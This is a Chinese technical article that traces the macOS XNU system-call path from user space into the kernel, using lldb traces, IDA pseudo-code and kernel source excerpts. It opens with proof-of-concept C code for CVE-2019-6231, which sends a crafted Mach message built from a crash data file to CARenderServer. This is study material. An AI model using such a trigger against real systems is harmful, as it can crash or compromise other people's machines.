# XNU系统调用深度解析
从一个函数分析到系统调用的内核实现
# 由一段POC而起
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <dirent.h>
#include <dlfcn.h>
#include <sys/stat.h>
#include <unistd.h>
#include <mach/i386/kern_return.h>
#include <mach/mach_traps.h>
#include <servers/bootstrap.h>
/*
 * Message buffer used by main() for the registration request (msgh_id 40202)
 * and, because the same buffer is passed as the receive buffer, for the reply.
 */
typedef struct quartz_register_client_s {
    mach_msg_header_t header;            /* standard Mach message header */
    uint32_t body;                       /* main() stores 4 here, one per entry in ports[] */
    mach_msg_port_descriptor_t ports[4]; /* port descriptors carried by the request */
    char padding[12];                    /* NOTE(review): presumably slack for the reply — confirm */
} quartz_register_client_t;
/*
 * Raw message buffer used by main() for the second request (msgh_id 40002):
 * a Mach header followed by an opaque, hand-assembled body.
 */
typedef struct quartzcore_mach_msg {
    mach_msg_header_t header; /* standard Mach message header */
    char msg_body[712];       /* body bytes; main() fills them from crash.data */
} quartzcore_mach_msg_t;
/*
 * Return the size in bytes of the file at path `fn`.
 *
 * Returns 0 when `fn` is NULL, when stat() fails (for example the file does
 * not exist), or when the reported size is negative. The previous version
 * ignored the stat() result and read an uninitialised struct on failure.
 */
uint64_t get_filesize(const char *fn) {
    struct stat st;

    if (fn == NULL || stat(fn, &st) != 0) {
        return 0;
    }
    if (st.st_size < 0) {
        return 0;
    }
    return (uint64_t)st.st_size;
}
int main(int argc, const char * argv[]) {
mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;
task_get_bootstrap_port(mach_task_self(), &bs_port);
const char *render_service_name = "com.apple.CARenderServer";
kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) = dlsym(RTLD_DEFAULT, "bootstrap_look_up");
kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &p);
if (kr != KERN_SUCCESS) {
return -1;
}
printf("[*] Get service of %s successully!\n", render_service_name);
quartz_register_client_t msg_register;
memset(&msg_register, 0, sizeof(msg_register));
msg_register.header.msgh_bits =
MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |
MACH_MSGH_BITS_COMPLEX;
msg_register.header.msgh_remote_port = p;
msg_register.header.msgh_local_port = mig_get_reply_port();
msg_register.header.msgh_id = 40202; // _XRegisterClient
msg_register.body = 4;
msg_register.ports[0].name = mach_task_self();
msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[1].name = mach_task_self();
msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[2].name = mach_task_self();
msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;
msg_register.ports[3].name = mach_task_self();
msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;
msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;
kr = mach_msg(&msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,
sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),
msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if (kr != KERN_SUCCESS) {
return -1 ;
}
mach_port_t context_port = *(uint32_t *)((uint8_t *)&msg_register + 0x1c);
uint32_t conn_id = *(uint32_t *)((uint8_t *)&msg_register + 0x30);
printf("[*] context_port: 0x%x, conn_id: 0x%x\n",context_port,conn_id);
char *crash_log = "crash.data"; //size is 736.
FILE *fp = fopen(crash_log, "rb");
if(fp == NULL){
printf("fopen error!\n");
}
uint64_t fsize = get_filesize(crash_log);
void *msg_buf = malloc(fsize);
memset(msg_buf, 0, fsize);
fread(msg_buf, fsize, 1, fp);
quartzcore_mach_msg_t qc_mach_msg = {0};
qc_mach_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
qc_mach_msg.header.msgh_remote_port = context_port;
qc_mach_msg.header.msgh_id = 40002;
memset(qc_mach_msg.msg_body, 0x0, sizeof(qc_mach_msg.msg_body));
*(uint32_t *)(qc_mach_msg.msg_body + 0) = 0x1; // Ports count
memcpy(qc_mach_msg.msg_body+4+12, msg_buf+0x1c+0xc, 736-0x1c-0xc);
*(uint32_t *)(qc_mach_msg.msg_body + 4 + 12 + 4) = conn_id;
kr = mach_msg(&qc_mach_msg.header, MACH_SEND_MSG,736, 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
if (kr != KERN_SUCCESS) {
printf("[-] Send message failed: 0x%d\n", kr);
return -1 ;
}
return 0;
}
里面的Mach函数mach_msg()
最终会执行到哪里?于是展开一次追踪。
从IDA的导入表中可以看到这个函数是从libSystem.B.dylib导入的。顺便说下,这个动态库实际上只是一层封装,里面导入了/usr/lib/system下面的动态库。
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
frame #0: 0x00007fff79299694 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
-> 0x7fff79299694 <+0>: pushq %rbp
0x7fff79299695 <+1>: movq %rsp, %rbp
0x7fff79299698 <+4>: pushq %r15
0x7fff7929969a <+6>: pushq %r14
Target 0: (CVE-2019-6231-poc) stopped.
调试可以看出mach_msg实现在libsystem_kernel.dylib之中
(lldb) dis
libsystem_kernel.dylib`mach_msg:
-> 0x7fff79299694 <+0>: pushq %rbp
0x7fff79299695 <+1>: movq %rsp, %rbp
0x7fff79299698 <+4>: pushq %r15
0x7fff7929969a <+6>: pushq %r14
0x7fff7929969c <+8>: pushq %r13
0x7fff7929969e <+10>: pushq %r12
0x7fff792996a0 <+12>: pushq %rbx
0x7fff792996a1 <+13>: subq $0x28, %rsp
0x7fff792996a5 <+17>: movl %ecx, %r13d
0x7fff792996a8 <+20>: movl %esi, %ebx
0x7fff792996aa <+22>: movq %rdi, %r14
0x7fff792996ad <+25>: movl 0x10(%rbp), %eax
0x7fff792996b0 <+28>: movl %ebx, %r12d
0x7fff792996b3 <+31>: andl $0xfffffbbf, %r12d ; imm = 0xFFFFFBBF
0x7fff792996ba <+38>: movl %eax, (%rsp)
0x7fff792996bd <+41>: movl %r12d, %esi
0x7fff792996c0 <+44>: movl %edx, %r15d
0x7fff792996c3 <+47>: movl %r8d, -0x2c(%rbp)
0x7fff792996c7 <+51>: movl %r9d, -0x30(%rbp)
0x7fff792996cb <+55>: callq 0x7fff79299170 ; mach_msg_trap
...
/*
 * IDA pseudo-code for the user-space mach_msg() wrapper (decompiler output,
 * not compilable as-is: the arguments passed to mach_msg_trap() were dropped
 * by the decompiler).
 *
 * The wrapper issues mach_msg_trap() once and returns immediately on success.
 * Otherwise it keeps re-issuing the trap while the result is one of two
 * specific codes, unless the matching option bit asks it not to.
 *
 * Constants, decoded (names per <mach/message.h>):
 *   0x40               MACH_SEND_INTERRUPT
 *   268435463          0x10000007, MACH_SEND_INTERRUPTED
 *   bit 0xA (0x400)    MACH_RCV_INTERRUPT
 *   268451845          0x10004005, MACH_RCV_INTERRUPTED
 */
mach_msg_return_t __cdecl mach_msg(mach_msg_header_t *msg, mach_msg_option_t option, mach_msg_size_t send_size, mach_msg_size_t rcv_size, mach_port_name_t rcv_name, mach_msg_timeout_t timeout, mach_port_name_t notify)
{
mach_msg_return_t result; // eax
mach_msg_option_t v8; // er12
result = mach_msg_trap();
// zero result: nothing to retry
if ( !result )
return 0;
// option bit 0x40 clear: re-issue the trap while the result is 0x10000007
if ( !(option & 0x40) && result == 268435463 )
{
do
result = mach_msg_trap();
while ( result == 268435463 );
}
v8 = option;
// option bit 10 (0x400) clear: re-issue the trap while the result is 0x10004005
if ( !_bittest(&v8, 0xAu) && result == 268451845 )
{
do
result = mach_msg_trap();
while ( result == 268451845 );
}
return result;
}
通过调试和IDA反汇编mach_msg函数可以看出,最终会调用mach_msg_trap这个函数,再跟一下
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1
frame #0: 0x00007fff79299170 libsystem_kernel.dylib`mach_msg_trap
libsystem_kernel.dylib`mach_msg_trap:
-> 0x7fff79299170 <+0>: movq %rcx, %r10
0x7fff79299173 <+3>: movl $0x100001f, %eax ; imm = 0x100001F
0x7fff79299178 <+8>: syscall
0x7fff7929917a <+10>: retq
Target 0: (CVE-2019-6231-poc) stopped.
这个函数把调用号0x100001f放入eax后执行syscall指令。0x100001f的高8位是系统调用类别(1,即Mach类),低24位是类别内的编号(0x1f,即31号Mach trap)。可以小结得到:系统库封装了最底层的实现,最终通过系统调用进入内核。在用户层到这里就已经到头了,无法再跟进。
# XNU内核系统调用流程
系统调用发生在内核之中,那么最开始处理系统调用的地方又在哪?通过intel官方文档可以找到
SYSCALL invokes an OS system-call handler at privilege level 0.
It does so by loading RIP from the IA32_LSTAR MSR
也就是说,内核需要把系统调用处理函数的入口地址写入IA32_LSTAR这个MSR(model specific register)。在内核源码中,这一步对应osfmk/i386/mp_desc.c中的cpu_syscall_init(cpu_data_t *cdp)函数:
/*
 * Set MSRs for sysenter/sysexit and syscall/sysret for 64-bit.
 *
 * cdp is only used when MONOTONIC is enabled (passed to mt_cpu_up());
 * otherwise it is marked unused.
 *
 * The write that matters for the SYSCALL path is MSR_IA32_LSTAR, which is
 * loaded with the (double-mapped) address of hi64_syscall.
 */
void
cpu_syscall_init(cpu_data_t *cdp)
{
#if MONOTONIC
mt_cpu_up(cdp);
#else /* MONOTONIC */
#pragma unused(cdp)
#endif /* !MONOTONIC */
/* SYSENTER path: code segment, entry point (hi64_sysenter) and stack. */
wrmsr64(MSR_IA32_SYSENTER_CS, SYSENTER_CS);
wrmsr64(MSR_IA32_SYSENTER_EIP, DBLMAP((uintptr_t) hi64_sysenter));
wrmsr64(MSR_IA32_SYSENTER_ESP, current_cpu_datap()->cpu_desc_index.cdi_sstku);
/* Enable syscall/sysret */
/* Read-modify-write so only the SCE bit is added to the current EFER value. */
wrmsr64(MSR_IA32_EFER, rdmsr64(MSR_IA32_EFER) | MSR_IA32_EFER_SCE);
/*
 * MSRs for 64-bit syscall/sysret
 * Note USER_CS because sysret uses this + 16 when returning to
 * 64-bit code.
 */
/* LSTAR: the SYSCALL entry point is hi64_syscall. */
wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
/* STAR: USER_CS goes in bits 48-63, KERNEL64_CS in bits 32-47. */
wrmsr64(MSR_IA32_STAR, (((uint64_t)USER_CS) << 48) | (((uint64_t)KERNEL64_CS) << 32));
/*
 * Emulate eflags cleared by sysenter but note that
 * we also clear the trace trap to avoid the complications
 * of single-stepping into a syscall. The nested task bit
 * is also cleared to avoid a spurious "task switch"
 * should we choose to return via an IRET.
 */
wrmsr64(MSR_IA32_FMASK, EFL_DF|EFL_IF|EFL_TF|EFL_NT);
}
wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
也就是系统调用会由hi64_syscall
函数处理。这个函数实现在xnu/osfmk/x86_64/idt64.s
之中
/*
 * SYSCALL entry point (two labels for the same code).
 *
 * Saves the user stack pointer, switches to the per-CPU exception stack and
 * builds an ISF64 frame there holding the user SS/RIP/RSP/RFLAGS, a pseudo
 * CS, and the syscall number (in the ERR slot). The frame is tagged with
 * HNDL_SYSCALL / T_SYSCALL before control jumps to L_dispatch.
 *
 * On entry (per the Intel SYSCALL definition and the comments below):
 * RCX holds the user RIP, R11 the user RFLAGS, RAX the syscall code.
 */
Entry(hi64_syscall)
Entry(idt64_syscall)
/* Switch GS base so the %gs-relative per-CPU accesses below work. */
swapgs
/* Use RAX as a temporary by shifting its contents into R11[32:63]
 * The systemcall number is defined to be a 32-bit quantity, as is
 * RFLAGS.
 */
shlq $32, %rax
or %rax, %r11
/* From here until "Restore RAX": R11 = (syscall number << 32) | RFLAGS. */
.globl EXT(dblsyscall_patch_point)
EXT(dblsyscall_patch_point):
// movabsq $0x12345678ABCDEFFFULL, %rax
/* Generate offset to the double-mapped per-CPU data shadow
 * into RAX
 */
leaq EXT(idt64_hndl_table0)(%rip), %rax
mov 16(%rax), %rax
mov %rsp, %gs:CPU_UBER_TMP(%rax) /* save user stack */
mov %gs:CPU_ESTACK(%rax), %rsp /* switch stack to per-cpu estack */
/* Reserve room for one ISF64 frame on the new stack. */
sub $(ISF64_SIZE), %rsp
/*
 * Synthesize an ISF frame on the exception stack
 */
movl $(USER_DS), ISF64_SS(%rsp)
mov %rcx, ISF64_RIP(%rsp) /* rip */
/* RCX is free now that RIP is stored; reuse it to fetch the saved user RSP. */
mov %gs:CPU_UBER_TMP(%rax), %rcx
mov %rcx, ISF64_RSP(%rsp) /* user stack --changed */
mov %r11, %rax
shrq $32, %rax /* Restore RAX */
mov %r11d, %r11d /* Clear r11[32:63] */
mov %r11, ISF64_RFLAGS(%rsp) /* rflags */
movl $(SYSCALL_CS), ISF64_CS(%rsp) /* cs - a pseudo-segment */
mov %rax, ISF64_ERR(%rsp) /* err/rax - syscall code */
/* Record which handler and trap number the common dispatcher should use. */
movq $(HNDL_SYSCALL), ISF64_TRAPFN(%rsp)
movq $(T_SYSCALL), ISF64_TRAPNO(%rsp) /* trapno */
/* Undo the swapgs done on entry before handing off. */
swapgs
jmp L_dispatch /* this can only be 64-bit */
继续跟下去,会得到如下执行流程
syscall-->hi64_syscall-->L_dispatch-->ks_dispatch-->ks_dispatch_user-->L_dispatch_U64-->
L_dispatch_64bit-->L_common_dispatch-->hndl_syscall
/*
 * 64bit Tasks
 * System call entries via syscall only:
 *
 * r15 x86_saved_state64_t
 * rsp kernel stack
 *
 * both rsp and r15 are 16-byte aligned
 * interrupts disabled
 * direction flag cleared
 *
 * Reads the saved RAX from the state pointed to by r15, isolates the
 * syscall class bits, and branches to the handler for that class
 * (mach / unix / machdep / diag). An unrecognised class raises
 * EXC_SYSCALL through i386_exception.
 */
Entry(hndl_syscall)
TIME_TRAP_UENTRY
movq %gs:CPU_ACTIVE_THREAD,%rcx /* get current thread */
movl $-1, TH_IOTIER_OVERRIDE(%rcx) /* Reset IO tier override to -1 before handling syscall */
movq TH_TASK(%rcx),%rbx /* point to current task */
/* Check for active vtimers in the current task */
TASK_VTIMER_CHECK(%rbx,%rcx)
/*
 * We can be here either for a mach, unix machdep or diag syscall,
 * as indicated by the syscall class:
 */
movl R64_RAX(%r15), %eax /* syscall number/class */
/* Keep the full value in EAX; work on a copy in EDX for the class test. */
movl %eax, %edx
andl $(SYSCALL_CLASS_MASK), %edx /* syscall class */
cmpl $(SYSCALL_CLASS_MACH<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_mach_scall64)
cmpl $(SYSCALL_CLASS_UNIX<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_unix_scall64)
cmpl $(SYSCALL_CLASS_MDEP<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_mdep_scall64)
cmpl $(SYSCALL_CLASS_DIAG<<SYSCALL_CLASS_SHIFT), %edx
je EXT(hndl_diag_scall64)
/* Syscall class unknown */
/* Re-enable interrupts before raising the exception. */
sti
CCALL3(i386_exception, $(EXC_SYSCALL), %rax, $1)
/* no return */
hndl_syscall这个函数会根据系统调用类别,把系统调用分为hndl_unix_scall64、hndl_mach_scall64、hndl_mdep_scall64、hndl_diag_scall64四类分别处理(前文mach_msg_trap使用的0x100001f属于Mach类,会进入hndl_mach_scall64)。
这里以hndl_unix_scall64为例
/*
 * Unix-class system call entry.
 *
 * Looks up the current thread and its task, bumps the thread's Unix syscall
 * counter, runs the vtimer check, re-enables interrupts and calls
 * unix_syscall() with r15 as its single argument.
 */
Entry(hndl_unix_scall)
TIME_TRAP_UENTRY
movq %gs:CPU_ACTIVE_THREAD,%rcx /* get current thread */
movq TH_TASK(%rcx),%rbx /* point to current task */
incl TH_SYSCALLS_UNIX(%rcx) /* increment call count */
/* Check for active vtimers in the current task */
TASK_VTIMER_CHECK(%rbx,%rcx)
/* Interrupts back on before entering the C handler. */
sti
CCALL1(unix_syscall, %r15)
/*
 * always returns through thread_exception_return
 */
这里调用了unix_syscall函数,这个函数在bsd/dev/i386/systemcalls.c之中实现,里面进行了一些权限检查,
以及根据系统调用表去调用对应的实现(注意:上面贴出的是hndl_unix_scall入口;64位入口hndl_unix_scall64的结构类似,调用的是同一文件中的unix_syscall64)
/*
 * Abridged excerpt of the BSD system-call dispatcher: pick the sysent entry
 * for the requested number, gather the arguments, and call the handler.
 * Lines marked "// ..." are elided.
 */
thread = current_thread();
uthread = get_bsdthread_info(thread);
// regs is derived from r15 ...
/* Strip the class bits; what is left indexes the sysent table. */
code = regs->rax & SYSCALL_NUMBER_MASK;
/* Out-of-range numbers are redirected to entry 63 instead of indexing past the table. */
callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
// ...
vt = (void *)uthread->uu_arg;
// ...
/* Copy the register-passed arguments, starting at rdi or rsi, into the uthread argument area. */
memcpy(vt, args_start_at_rdi ? &regs->rdi : &regs->rsi,
args_in_regs * sizeof(syscall_arg_t));
// ...
/* Invoke the handler: (proc, argument block, return-value slot). */
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0]));
目前执行的流程如下
hi64_syscall
L_dispatch_U64
L_dispatch_64bit
L_common_dispatch
hndl_syscall // rdx, pushed in hi64_syscall
hndl_unix_scall64
unix_syscall64
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0])); // now we're there
# 参考
https://www.binss.me/blog/interrupt-and-exception/
https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html